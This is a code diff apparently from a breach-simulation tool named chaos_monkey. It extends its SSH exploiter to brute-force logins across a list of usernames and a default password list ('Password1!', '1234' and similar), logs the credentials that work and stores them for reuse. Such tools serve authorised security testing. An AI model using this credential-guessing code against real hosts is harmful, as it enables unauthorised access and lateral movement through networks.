diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py
index 659fade3d..99512cc53 100644
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@@ -194,7 +194,7 @@ class Configuration(object):
     psexec_passwords = ["Password1!", "1234", "password", "12345678"]
 
     # ssh exploiter
-    ssh_user = "root"
+    ssh_users = ["root"]
     ssh_passwords = ["Password1!", "1234", "password", "12345678"]
 
     # rdp exploiter
diff --git a/chaos_monkey/example.conf b/chaos_monkey/example.conf
index 6fc61261f..cbaa0e42a 100644
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@@ -39,7 +39,7 @@
 
 
     "kill_file_path_linux": "/var/run/monkey.not",
-    "kill_file_path_windows": "%windir%\monkey.not",
+    "kill_file_path_windows": "%windir%\\monkey.not",
     "dropper_try_move_first": false,
     "exploiter_classes": [
         "SSHExploiter",
@@ -69,7 +69,9 @@
     "serialize_config": false,
     "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
     "skip_exploit_if_file_exist": true,
-    "ssh_user": "root",
+    "ssh_user": [
+        "root"
+    ],
     "local_network_scan": true,
     "tcp_scan_get_banner": true,
     "tcp_scan_interval": 200,
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index 717fc9bae..c299062af 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -1,12 +1,13 @@
 import paramiko
-import monkeyfs
 import logging
+import time
+from itertools import product
+import monkeyfs
 from tools import build_monkey_commandline
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
 from network.tools import check_port_tcp
-import time
 
 __author__ = 'hoffer'
 
@@ -43,31 +44,34 @@ class SSHExploiter(HostExploiter):
             return False                
 
         passwords = list(self._config.ssh_passwords[:])
-        known_password = host.get_credentials(self._config.ssh_user)
-        if known_password is not None:
-            if known_password in passwords:
-                passwords.remove(known_password)
-            passwords.insert(0, known_password)
+        users = list(self._config.ssh_users)
+        known_passwords = [host.get_credentials(x) for x in users]
+        if len(known_passwords) > 0:
+            for known_pass in known_passwords:
+                if known_pass in passwords:
+                    passwords.remove(known_pass)
+                    passwords.insert(0, known_pass) #try first
+        user_pass = product(users,passwords)
 
         exploited = False
-        for password in passwords:
+        for user, curpass in user_pass:
             try:
                 ssh.connect(host.ip_addr,
-                            username=self._config.ssh_user,
-                            password=password,
+                            username=user,
+                            password=curpass,
                             port=port,
                             timeout=None)
 
                 LOG.debug("Successfully logged in %r using SSH (%s : %s)",
-                          host, self._config.ssh_user, password)
-                host.learn_credentials(self._config.ssh_user, password)
+                          host, user, curpass)
+                host.learn_credentials(user, curpass)
                 exploited = True
                 break
 
             except Exception, exc:
                 LOG.debug("Error logging into victim %r with user"
                           " %s and password '%s': (%s)", host,
-                          self._config.ssh_user, password, exc)
+                          user, curpass, exc)
                 continue
 
         if not exploited: